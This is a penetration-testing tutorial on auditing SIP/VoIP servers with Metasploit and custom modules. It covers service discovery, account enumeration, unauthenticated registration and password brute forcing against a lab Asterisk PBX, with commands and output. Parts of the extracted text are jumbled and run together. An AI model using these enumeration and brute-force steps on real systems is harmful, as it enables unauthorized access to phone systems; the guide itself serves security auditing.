Penetration Testing SIP Services

(1)

Using Metasploit Framework

(2)

(3)

1 Discovering SIP Services and Devices...5

1.1 Discovering Active SIP Services and Devices...5

1.2 Enumerating SIP Services... 13

2 Authentication Analysis of SIP Services...19

2.1 SIP Server Registration Without Authentication...19

2.2 Brute Forcing Target Accounts...23

3 Authorization Analysis of SIP Services...30

(4)

Illustrations

Detecting Active Devices and Port Scan for Services...7

UDP Discovery for Active Devices... 9

SIP Service Discovery via Generic OPTIONS Auxiliary Module...10

SIP Service Discovery via OPTIONS Module...11

SIP Service Discovery via REGISTER Module...12

Account Enumeration via INVITE Method...15

Account Enumeration via SUBSCRIBE Method...16

Account Enumeration via REGISTER Method...18

Account Enumeration with a User File...19

SIP Server Registration Without Authentication...22

Brute Forcing a Valid Account with a Password File...25

Brute Forcing a Account File with a Password File...27

(5)

1 Discovering SIP Services and Devices

1.1 Discovering Active SIP Services and Devices

Many servers and network devices have SIP services for special purposes. This purpose

could be a commercial service, internal communication of a company, communication

between different sites or by default device installation. First step of the SIP audit is

discovering related devices and mapping of the SIP network. This step is required to

understand the scope and target SIP services usage. Purpose of the SIP services,

version and type of the service softwares, device management procedures and type of

the SIP clients must be known before penetration testing.

Discovering SIP services is the first step of the audit and there are many ways to detect

SIP devices. Ping sweep, TCP/UDP sweeps or ARP discovery methods are available to

discover active devices. Most of these methods are not efficient with a well-designed

firewall, because only SIP services could be permitted via firewall. Also discovering an

active device is not efficient without identification and enumeration. Based on this

requirement, SIP based devices could be identified using service identification and

device fingerprints.

Required Minimum Results for Discovery Step

➔

IP Addresses of Active SIP Devices

➔

Operating System and Version of Active SIP Devices

➔

Service Software and Version of SIP Services

➔

Role of SIP Services (Call Manager, Proxy, Gateway)

This chapter explains SIP services analysis with Metasploit Framework and it has many

auxiliary modules to discover the active devices. Ping sweep and port scanning are

basic discovery methods. Active devices could be detected a ping sweep and then a port

scan could be performed for active services on detected device. Nmap is the best

network mapping software and it is available in Metasploit Framework for all scanning

functions. -sP parameter should be selected for ping sweep and -PX parameters such as

-PI, -PS, -PSA, -PT available for ping type. Port scan is more complicated, -sX

(6)

In our example; first of all an ICMP based ping sweep performed, then a port scan

performed with os identification and script modules. When Nmap scan is finished, results

stored to the DB of Metasploit Framework. Scan results are accessible via hosts,

services and vulns commands.

Metasploit # db_nmap -sP -PI 172.16.100.1-10

[*] Nmap: Starting Nmap 6.01 ( http://nmap.org ) at 2012-12-25 15:46 EET [*] Nmap: Nmap scan report for 172.16.100.1

[*] Nmap: Host is up.

[*] Nmap: Nmap scan report for 172.16.100.6 [*] Nmap: Host is up (0.00060s latency).

[*] Nmap: MAC Address: 08:00:27:38:4E:0A (Cadmus Computer Systems)

[*] Nmap: Nmap done: 10 IP addresses (2 hosts up) scanned in 0.33 seconds

Metasploit # db_nmap -sS -sV -A -O -p1-65535 172.16.100.6

[*] Nmap: Starting Nmap 6.01 ( http://nmap.org ) at 2012-12-25 15:46 EET [*] Nmap: Nmap scan report for 172.16.100.6

[*] Nmap: Host is up (0.0048s latency). [*] Nmap: Not shown: 65527 closed ports

[*] Nmap: PORT STATE SERVICE VERSION

[*] Nmap: 22/tcp open ssh OpenSSH 4.3 (protocol 2.0) [*] Nmap: | ssh-hostkey: 1024

1f:e2:e8:9e:2c:f8:31:39:36:f7:1d:aa:77:5e:ac:76 (DSA)

[*] Nmap: |_2048 38:a4:9d:29:8a:11:9d:e1:13:5d:5e:6d:76:a6:63:76 (RSA) [*] Nmap: 53/tcp open domain dnsmasq 2.45

[*] Nmap: | dns-nsid:

[*] Nmap: |_ bind.version: dnsmasq-2.45

[*] Nmap: 80/tcp open http Apache httpd 2.2.3 ((CentOS))

[*] Nmap: |_http-title: FreePBX

[*] Nmap: | http-methods: Potentially risky methods: TRACE

[*] Nmap: |_See http://nmap.org/nsedoc/scripts/http-methods.html [*] Nmap: | http-robots.txt: 1 disallowed entry

[*] Nmap: |_/

[*] Nmap: 111/tcp open rpcbind (rpcbind V2) 2 (rpc #100000) [*] Nmap: | rpcinfo:

(7)

[*] Nmap: 5038/tcp open asterisk Asterisk Call Manager 1.1 [*] Nmap: MAC Address: 08:00:27:38:4E:0A (Cadmus Computer Systems) [*] Nmap: Device type: general purpose

[*] Nmap: Running: Linux 2.6.X

[*] Nmap: OS CPE: cpe:/o:linux:kernel:2.6.22 [*] Nmap: OS details: Linux 2.6.22

[*] Nmap: Network Distance: 1 hop [*] Nmap: TRACEROUTE

[*] Nmap: HOP RTT ADDRESS [*] Nmap: 1 4.77 ms 172.16.100.6

[*] Nmap: OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .

[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 129.76 seconds

Metasploit # hosts

Hosts =====

address mac name os_name os_flavor os_sp purpose info comments

--- ---- -- --- --- ---

172.16.100.6 08:00:27:38:4E:0A Linux 2.6.X device

Metasploit # services

Services ========

host port proto name state info ---- ---- --- ---- --- ----

172.16.100.6 22 tcp ssh open OpenSSH 4.3 protocol 2.0 172.16.100.6 53 tcp domain open dnsmasq 2.45

172.16.100.6 80 tcp http open Apache httpd 2.2.3 (CentOS) 172.16.100.6 111 tcp rpcbind open 2 rpc #100000

172.16.100.6 749 tcp status open 1 rpc #100024 172.16.100.6 3306 tcp mysql open MySQL unauthorized 172.16.100.6 4445 tcp upnotifyp open

(8)

As you can see, port scan results didn't have any information about SIP services.

Because SIP services are available via UDP protocol in most cases. VoIP administrators

don't like SIP over TCP, because it is low performance alternative when comparing SIP

over UDP. In our port scan, we scanned only TCP ports via -sS parameter and it couldn't

detect any SIP over TCP services.

Metasploit Framework has a few auxiliary modules for UDP discovery. These modules

send valid UDP requests to related services, then target open ports send a response

and this response could use for identification. auxiliary/scanner/discovery/udp_sweep

module used for UDP scanning and results presented below.

Metasploit # use auxiliary/scanner/discovery/udp_sweep

Metasploit auxiliary(udp_sweep) # show options

Module options (auxiliary/scanner/discovery/udp_sweep): Name Current Setting Required Description ---- --- --- ---

BATCHSIZE 256 yes The number of hosts to probe in each set

CHOST no The local client address

RHOSTS yes The target address range or CIDR identifier

THREADS 1 yes The number of concurrent threads

Metasploit auxiliary(udp_sweep) # set RHOSTS 172.16.100.6

RHOSTS => 172.16.100.6

Metasploit auxiliary(udp_sweep) # set THREADS 10

THREADS => 10

Metasploit auxiliary(udp_sweep) # run

[*] Sending 12 probes to 172.16.100.6->172.16.100.6 (1 hosts) [*] Discovered DNS on 172.16.100.6:53

(f338858000010001000000000756455253494f4e0442494e440000100003c00c00100003 00000000000d0c646e736d6173712d322e3435)

[*] Discovered Portmap on 172.16.100.6:111 (100000 v2 TCP(111), 100000 v2 UDP(111), 100024 v1 UDP(746), 100024 v1 TCP(749))

(9)

Metasploit auxiliary(udp_sweep) # services Services

========

host port proto name state info ---- ---- --- ---- --- ----

172.16.100.6 22 tcp ssh open OpenSSH 4.3 protocol 2.0 172.16.100.6 53 udp dns open

f338858000010001000000000756455253494f4e0442494e440000100003c00c001000030 0000000000d0c646e736d6173712d322e3435

172.16.100.6 53 tcp domain open dnsmasq 2.45

172.16.100.6 80 tcp http open Apache httpd 2.2.3 (CentOS) 172.16.100.6 111 udp portmap open 100000 v2 TCP(111), 100000 v2 UDP(111), 100024 v1 UDP(746), 100024 v1 TCP(749)

172.16.100.6 111 tcp sunrpc open 100000 v2 172.16.100.6 746 udp sunrpc open 100024 v1 172.16.100.6 749 tcp sunrpc open 100024 v1

172.16.100.6 3306 tcp mysql open MySQL unauthorized 172.16.100.6 4445 tcp upnotifyp open

172.16.100.6 5038 tcp asterisk open Asterisk Call Manager 1.1 UDP Discovery for Active Devices

Unfortunately this UDP scanning module has support for rpc, dns, netbios, portmap,

mssql, ntp, snmp, sentinel and citrix services not SIP services. It is not efficient for

detecting SIP services too.

Correct discovery method for detecting SIP service is sending valid SIP requests to the

target SIP services. Metasploit has an auxiliary module for this purpose, it's name is

auxiliary/scanner/sip/options. This module sends OPTIONS request to the target SIP

service, then it reports Server: header and available methods. In our case, this SIP

software is Asterisk PBX 1.6.2.11.

Metasploit # use auxiliary/scanner/sip/options Metasploit auxiliary(options) # show options

Module options (auxiliary/scanner/sip/options): Name Current Setting Required Description ---- --- --- ---

BATCHSIZE 256 yes The number of hosts to probe in each set

(10)

CPORT 5060 no The local client port

RPORT 5060 yes The target port

THREADS 1 yes The number of concurrent threads TO nobody no The destination username to probe at each host

Metasploit auxiliary(options) # set RHOSTS 172.16.100.6

RHOSTS => 172.16.100.6

Metasploit auxiliary(options) # run

[*] 172.16.100.6 200 server='Asterisk PBX 1.6.2.11' verbs='INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY, INFO'

[*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed

SIP Service Discovery via Generic OPTIONS Auxiliary Module

I developed a SIP library for Metasploit Framework and a few modules for

demonstration, such as OPTIONS module named auxiliary/gamasec/sip/gsipoptions.

It can be useful for service detection and discovering additional information about the

target service. Sample usage of this module is presented below.

Metasploit # use auxiliary/gamasec/sip/gsipoptions

Metasploit auxiliary(gsipoptions) # set RHOSTS 172.16.100.6

RHOSTS => 172.16.100.6

Metasploit auxiliary(gsipoptions) # set VERBOSE true

VERBOSE => true

Metasploit auxiliary(gsipoptions) # show options

Module options (auxiliary/gamasec/sip/gsipoptions): Name Current Setting Required Description ---- --- --- ---

CHOST no The local client address CPORT 5065 no The local client port DEBUG 0 no Debug Level

FROM 100 yes The source username to probe at each host

(11)

RHOSTS 172.16.100.6 yes The target address range or CIDR identifier

RPORT 5060 yes The target port

THREADS 1 yes The number of concurrent threads TO 100 yes The destination username to probe at each host

Metasploit auxiliary(gsipoptions) # run [+] 172.16.100.6:5060 Response: 200 OK [*] Server : Asterisk PBX 1.6.2.11

SIP Service Discovery via OPTIONS Module

OPTIONS is not the only method to discover a SIP Service, other methods could be

required under IP or Request based filtering. Because of this requirement, other

developed modules REGISTER, INVITE and SUBSCRIBE could use for discovery. A

discovery attempt based on REGISTER method is presented below. REGISTER

module's name is auxiliary/gamasec/sip/gsipregister. After an execution with default

parameters, it reports that the target SIP service requires authentication. If target number

TO changed to 100 and login parameter USER_AS_FROM_and_TO changed to false,

it reports that the target service accepts registration. As you can see in this example,

discovering and understanding of SIP service require a few probes. Also other options

or other modules could use for discovery such as INVITE and SUBSCRIBE.

Metasploit # use auxiliary/gamasec/sip/gsipregister

Metasploit auxiliary(gsipregister) # set RHOSTS 172.16.100.6

RHOSTS => 172.16.100.6

Metasploit auxiliary(gsipregister) # show options

Module options (auxiliary/gamasec/sip/gsipregister):

Name Current Setting Required Description ---- --- --- --- CHOST no The local client address

CPORT 5065 no The local client port DEBUG false no Debug Level

(12)

FROM 1000 no The source username to probe at each host

LOGIN false yes Login Using Credentials

PASSWORD NOPASSWORD yes The login password to probe at each host

REALM realm.com.tr yes The login realm to probe at each host

RHOSTS 172.16.100.6 yes The target address range or CIDR identifier

RPORT 5060 yes The target port THREADS 1 yes The number of concurrent threads

TO 1000 no The destination username to probe at each host

USERNAME NOUSER yes The login username to probe at each host

USER_AS_FROM_and_TO true no Use the Username for From and To fields

Metasploit auxiliary(gsipregister) # run

[+] 172.16.100.6:5060 Credentials Required : SIP/2.0 401 Unauthorized [*] Server : Asterisk PBX 1.6.2.11

[*] Realm : asterisk

Metasploit auxiliary(gsipregister) # set TO 100

TO => 100

Metasploit auxiliary(gsipregister) # set USER_AS_FROM_and_TO false

USER_AS_FROM_and_TO => false

Metasploit auxiliary(gsipregister) # run [+] 172.16.100.6:5060 Response: 200 OK [*] Server : Asterisk PBX 1.6.2.11

SIP Service Discovery via REGISTER Module

(13)

1.2 Enumerating SIP Services

Enumeration is required for feature and authorization testing of SIP services. Valid

accounts, internal call schema, dial plan, special dial targets, prefixes for gateways,

value added services and voice message box should be defined as enumeration targets.

Enumeration is possible using different SIP requests such as OPTIONS, REGISTER,

SUBSCRIBE and INVITE. Enumeration step should be correctly defined and all

available methods should be used, because each request type has own conditions and

responses. Different types of enumeration are presented in this chapter, each method

should be performed to target SIP services.

Required Minimum Results for Enumeration Step

➔

Valid Prefixes and Special Gateways on SIP Service

➔

Valid Accounts and Target Numbers on SIP Service

➔

Voice Message Box of SIP Service

➔

Accounts or Numbers Without Password on SIP Service

INVITE method is available to initiate a call to the target number on SIP service with or

without authentication. Server could send different responses for some TO fields in

INVITE requests such as “404 Not Found”, “401 Unauthorized” or “403 Forbidden”, this

difference should be base for enumeration. For example, if “401 Unauthorized” or “200

OK” responses received only for valid targets, an enumeration should be defined to

search all users with “401 Unauthorized” or “200 OK”. Based on this fact, users with “401

Unauthorized” or “200 OK” responses should be identified as a valid account, target

number, vas service or gateway. If authentication is required before INVITE requests,

enumeration should be designed for that.

(14)

Holdenusploit # use auxiliary/gamasec/sip/gsipenumerator Holdenusploit auxiliary(gsipenumerator) # set METHOD INVITE

METHOD => INVITE

Holdenusploit auxiliary(gsipenumerator) # unset USERNAME

Unsetting USERNAME...

Holdenusploit auxiliary(gsipenumerator) # set NUMERIC_USERS true

NUMERIC_USERS => true

Holdenusploit auxiliary(gsipenumerator) # set NUMERIC_MAX 2100

NUMERIC_MAX => 2100

Holdenusploit auxiliary(gsipenumerator) # show options

Module options (auxiliary/gamasec/sip/gsipenumerator):

Name Current Setting Required Description ---- --- --- --- BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5

METHOD INVITE yes Method for Brute Force (SUBSCRIBE,REGISTER,INVITE)

NUMERIC_MAX 2100 yes Ending extension NUMERIC_MIN 0 yes Starting extension NUMERIC_USERS true yes Numeric Username Bruteforcing

RHOST 172.16.100.6 yes The target address RPORT 5060 yes The target port STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host

USERNAME NOUSER no The login username to probe at each host

USER_AS_FROM_and_TO true yes Try the username as the password for all users

USER_FILE no File containing usernames, one per line

VERBOSE false yes Whether to print output for all attempts

(15)

[+] user : 101 is Found, Server Response: 401 Unauthorized [+] user : 102 is Found, Server Response: 401 Unauthorized [+] user : 200 is Found, Server Response: 401 Unauthorized [+] user : 201 is Found, Server Response: 401 Unauthorized [+] user : 2000 is Found, Server Response: 401 Unauthorized [+] user : 200 is Found, Server Response: 401 Unauthorized [+] user : 201 is Found, Server Response: 401 Unauthorized [+] user : 2000 is Found, Server Response: 401 Unauthorized

[*] Auxiliary module execution completed

Account Enumeration via INVITE Method

SUBSCRIBE method is available to subscribe an account to the target SIP service with

or without authentication. Server could send different responses for some TO fields in

SUBSCRIBE requests such as “404 Not Found”, “401 Unauthorized” or “403 Forbidden”,

this difference should be base for enumeration. For example, if “401 Unauthorized” or

“200 OK” responses received only for valid targets, an enumeration should be defined to

search all users with “401 Unauthorized” or “200 OK”. Based on this fact, users with “401

Unauthorized” or “200 OK” responses should be identified as a valid account, target

number, vas service or gateway. If server sends different responses for SUBSCRIBE

requests, first enumeration method should SUBSCRIBE for less damage not INVITE or

REGISTER.

As mentioned above my sip enumeration module could be used for SUBSCRIBE based

enumeration. This module useful to enumerate and identify value added services,

prefixes, gateways or number based trunks. This module supports authentication, if

server requires authentication it calculates nonce and send with given credentials.

Authentication feature could be activated with LOGIN, USERNAME, PASSWORD and

REALM variables. SUBSCRIBE method selected with NUMERIC_USERS in this

example, NUMERIC_MAX variable is defined to limit enumeration.

Holdenusploit # use auxiliary/gamasec/sip/gsipenumerator Holdenusploit auxiliary(gsipenumerator) # unset USERNAME

Holdenusploit auxiliary(gsipenumerator) # set NUMERIC_USERS true

NUMERIC_MAX => 2100

Holdenusploit auxiliary(gsipenumerator) # set METHOD SUBSCRIBE

METHOD => SUBSCRIBE

(16)

---- --- --- --- BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5

METHOD SUBSCRIBE yes Method for Brute Force (SUBSCRIBE,REGISTER,INVITE)

Holdenusploit auxiliary(gsipenumerator) # run

[+] user : 101 is Found, Server Response: 401 Unauthorized [+] user : 102 is Found, Server Response: 401 Unauthorized [+] user : 200 is Found, Server Response: 401 Unauthorized [+] user : 201 is Found, Server Response: 401 Unauthorized [+] user : 2000 is Found, Server Response: 401 Unauthorized

(17)

REGISTER method is available to register an account to the target SIP service with or

without authentication. Server could send different responses for some TO fields in

REGISTER requests such as “404 Not Found”, “401 Unauthorized” or “403 Forbidden”,

this difference should be base for enumeration. For example, if “401 Unauthorized” or

“200 OK” responses received only for valid targets, an enumeration should be defined to

search all users with “401 Unauthorized” or “200 OK”. Based on this fact, users with “401

Unauthorized” or “200 OK” responses should be identified as a valid account, target

number, vas service or gateway.

As mentioned above my sip enumeration module could be used for REGISTER based

enumeration. This module useful to enumerate and identify value added services,

prefixes, gateways or number based trunks. REGISTER method selected with

NUMERIC_USERS in this example, NUMERIC_MAX variable is defined to limit

enumeration.

Holdenusploit # use auxiliary/gamasec/sip/gsipenumerator

Holdenusploit auxiliary(gsipenumerator) # set METHOD REGISTER

METHOD => REGISTER

NUMERIC_MAX => 2100

Holdenusploit auxiliary(gsipenumerator) # unset USERNAME

Name Current Setting Required Description ---- --- --- --- BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5

METHOD REGISTER yes Method for Brute Force (SUBSCRIBE,REGISTER,INVITE)

(18)

Holdenusploit auxiliary(gsipenumerator) # run [+] user : 100 is Found, Server Response: 200 OK

Account Enumeration via REGISTER Method

All SIP service accounts could be alphanumeric value, this means numeric REGISTER

enumeration couldn't performed this type of systems. In this situation other enumeration

methods should be used or wordlist based brute force should be performed. Wordlist

based REGISTER enumeration requires a large user list to confirm. My enumeration

module supports this type of enumeration too, it is available for all enumeration types.

User list should be defined in USER_FILE variable, also NUMERIC_USERS variable

should be false. 3 enumeration types are performed with a wordlist in next example.

Holdenusploit # use auxiliary/gamasec/sip/gsipenumerator

Holdenusploit auxiliary(gsipenumerator) # set NUMERIC_USERS false

NUMERIC_USERS => false

Holdenusploit auxiliary(gsipenumerator) # set METHOD REGISTER

METHOD => REGISTER

Holdenusploit auxiliary(gsipenumerator) # set USER_FILE "/tmp/users"

USER_FILE => /tmp/users

Holdenusploit auxiliary(gsipenumerator) # run [+] user : 100 is Found, Server Response: 200 OK

Holdenusploit auxiliary(gsipenumerator) # set METHOD SUBSCRIBE

(19)

[+] user : 2000 is Found, Server Response: 401 Unauthorized

Holdenusploit auxiliary(gsipenumerator) # set METHOD INVITE

METHOD => INVITE

[+] user : 2000 is Found, Server Response: 401 Unauthorized

Account Enumeration with a User File

REGISTER response and SUBSCRIBE/INVITE responses are different, because all

accounts enumerated with own condition. 100 is a special accounts, it doesn't need any

password authentication with REGISTER method. REGISTER only identifies 100,

because 2000 and other invalid numbers need authentication. SUBSCRIBE only

identifies 2000, because SUBSCRIBE method for 100 not available. INVITE only

identifies 2000, because call conditions of 100 are different from other accounts. All

methods should be performed for full enumeration and discovery, because all methods

have advantages and disadvantages.

(20)

2 Authentication Analysis of SIP Services

2.1 SIP Server Registration Without Authentication

Authentication function depends on SIP service features and role. Authentication feature

could be not required or initiated on SIP trunks, SIP clients and default installations.

➔

Generally, SIP trunks defined as an IP address or specific FROM number.

Challenge response or certificate based authentication is slow for quick response

in this type of large call counts. Because of that, SIP trunks have no password or IP

based filter applied for trunk authentication. These SIP trunks use specific FROM

numbers or Proxy fields to initiate a call.

➔

Many SIP clients have REGISTER and INVITE support without authentication.

➔

SIP servers and devices cannot authenticate users without right configuration,

most of default installations do not support authentication.

➔

Moreover, SIP servers have special target numbers to accept call for voice

message box, value added services or gateways. Registration without password is

possible in this kind of configuration.

Based on these informations, all SIP servers should be analyzed for weak authentication

and special target numbers without authentication.

REGISTER method should be used to register a SIP server, also this method supports

authentication. In this example, SIP server analyzed for REGISTER without

authentication. My register module could be used for REGISTER tests, it supports basic

REGISTER options. 2000 is valid, NOUSER is invalid usernames for SIP server. Firstly,

SIP server analyzed for USERNAME variable (in this case NOUSER and 2000) and “401

Unauthorized” received.

Holdenusploit # use auxiliary/gamasec/sip/gsipregister Holdenusploit auxiliary(gsipregister) # show options

Module options (auxiliary/gamasec/sip/gsipregister):

Name Current Setting Required Description ---- --- --- --- CHOST no The local client address

DEREGISTER false yes DeRegister After Successful Login

(21)

LOGIN false yes Login Using Credentials

PASSWORD NOPASSWORD yes The login password to probe at each host

RPORT 5060 yes The target port THREADS 1 yes The number of concurrent threads

USERNAME NOUSER yes The login username to probe at each host

USER_AS_FROM_and_TO true no Use the Username for From and To fields

Holdenusploit auxiliary(gsipregister) # set RHOSTS 172.16.100.6

RHOSTS => 172.16.100.6

Holdenusploit auxiliary(gsipregister) # run

Holdenusploit auxiliary(gsipregister) # set USERNAME 2000

USERNAME => 2000

Holdenusploit auxiliary(gsipregister) # run

(22)

The target number 100 must be a kind of value added service number or number for

special purpose.

Holdenusploit auxiliary(gsipregister) # set USER_AS_FROM_and_TO false

USER_AS_FROM_and_TO => false

Holdenusploit auxiliary(gsipregister) # set TO 100

TO => 100

Holdenusploit auxiliary(gsipregister) # run [+] 172.16.100.6:5060 Response: 200 OK [*] Server : Asterisk PBX 1.6.2.11

SIP Server Registration Without Authentication

(23)

2.2 Brute Forcing Target Accounts

Registering a SIP server is the first step of the SIP service analysis and mostly it

requires authentication. The authentication system of SIP service is based on

challenge-response. Challenge is “nonce” field of “WWW-Authenticate:”, 3 hashes should be

calculated with this string. First hash is calculated like MD5(user:realm:password),

second hash is calculated like MD5(requestname:uri) and final hash is calculated like

(hash1:nonce:hash2). This final hash required when sending authentication information.

Brute force attack should be performed in three types; to a confirmed account, to a user

list in a file, to a numeric range. A powerful password wordlist file required for this brute

force attack. Account password could be identified with this password file when an

account confirmed. Another option is trying this password file for a user list or a numeric

range. My brute force module supports all of these 3 attack types, with a password or a

password file. Next examples include Brute Forcing methods and usage of modules.

First Case : Brute Forcing a Valid Account with a Password File (Account User is 2000)

Holdenusploit # use auxiliary/gamasec/sip/gsipbruteforce Holdenusploit auxiliary(gsipbruteforce) # show options

Module options (auxiliary/gamasec/sip/gsipbruteforce):

Name Current Setting Required Description ---- --- --- ---

BLANK_PASSWORDS true no Try blank passwords for all users

BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5

FROM 1000 no The source username to probe

METHOD REGISTER yes The method for Brute Forcing (REGISTER)

(24)

PASSWORD NOPASSWORD no The login password to probe

PASS_FILE no File containing passwords, one per line

REALM realm.com.tr yes The login realm to probe

RHOST yes The target address RPORT 5060 yes The target port STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host

TO 1000 no The destination username to probe

USERNAME NOUSER no The login username to probe

USERPASS_FILE no File containing users and passwords separated by space, one pair per line

USER_AS_FROM_and_TO true yes Try the username as the from/to for all users

USER_AS_PASS false no Try the username as the password for all users

VERBOSE true yes Whether to print output for all attempts

Holdenusploit auxiliary(gsipbruteforce) # set USERNAME 2000

USERNAME => 2000

Holdenusploit auxiliary(gsipbruteforce) # set RHOST 172.16.100.6

RHOST => 172.16.100.6

Holdenusploit auxiliary(gsipbruteforce) # set PASS_FILE "/tmp/passwords"

PASS_FILE => /tmp/passwords

Holdenusploit auxiliary(gsipbruteforce) # run [*] Trying username:'2000' with password:''

[*] 172.16.100.6:5060 - [01/11] - Authentication Failed : SIP/2.0 403 Forbidden (Bad auth)

[*] Trying username:'2000' with password:'NOPASSWORD'

[*] Trying username:'2000' with password:'deneme1234'

(25)

[*] Trying username:'2000' with password:'1244'

[*] Trying username:'2000' with password:'dene'

[*] Trying username:'2000' with password:'password123'

[+] user : 2000 password : password123 result : Request Succeed

[*] Trying username:'2000' with password:'lsadhflkajshf'

[*] Trying username:'2000' with password:'s3cur3'

[*] Trying username:'2000' with password:'letmein123'

[*] Trying username:'2000' with password:'secret123'

[*] Trying username:'2000' with password:'quit3s3curE123'

Brute Forcing a Valid Account with a Password File

Second Case : Brute Forcing an Account File with a Password File

Holdenusploit auxiliary(gsipbruteforce) # show options

(26)

probe

NUMERIC_MAX 9999 yes Ending extension NUMERIC_MIN 0 yes Starting extension NUMERIC_USERS false yes Numeric Username Bruteforcing

Holdenusploit auxiliary(gsipbruteforce) # set RHOST 172.16.100.6

RHOST => 172.16.100.6

Holdenusploit auxiliary(gsipbruteforce) # set USER_FILE "/tmp/users"

USER_FILE => /tmp/users

Holdenusploit auxiliary(gsipbruteforce) # unset USERNAME

Holdenusploit auxiliary(gsipbruteforce) # set VERBOSE false

VERBOSE => false

(27)

[+] user : 100 password : result : Request Succeed without Login Information

[+] user : 100 password : NOPASSWORD result : Request Succeed without Login Information

[+] user : 2000 password : password123 result : Request Succeed

[+] user : 100 password : deneme1234 result : Request Succeed without Login Information

[+] user : 100 password : 1244 result : Request Succeed without Login Information

[+] user : 100 password : dene result : Request Succeed without Login Information

[+] user : 100 password : password123 result : Request Succeed without Login Information

[+] user : 100 password : lsadhflkajshf result : Request Succeed without Login Information

[+] user : 100 password : s3cur3 result : Request Succeed without Login Information

[+] user : 100 password : letmein123 result : Request Succeed without Login Information

[+] user : 100 password : secret123 result : Request Succeed without Login Information

[+] user : 100 password : quit3s3curE123 result : Request Succeed without Login Information

Brute Forcing a Account File with a Password File

Third Case : Brute Forcing a Numeric Range (0-2100) with a Password File

Holdenusploit auxiliary(gsipbruteforce) # show options

(28)

probe

NUMERIC_MAX 9999 yes Ending extension NUMERIC_MIN 0 yes Starting extension NUMERIC_USERS false yes Numeric Username Bruteforcing

Holdenusploit auxiliary(gsipbruteforce) # unset USER_FILE

Unsetting USER_FILE...

Holdenusploit auxiliary(gsipbruteforce) # unset PASS_FILE

Unsetting PASS_FILE...

Holdenusploit auxiliary(gsipbruteforce) # set NUMERIC_USERS true

Holdenusploit auxiliary(gsipbruteforce) # set NUMERIC_MAX 2100

NUMERIC_MAX => 2100

(29)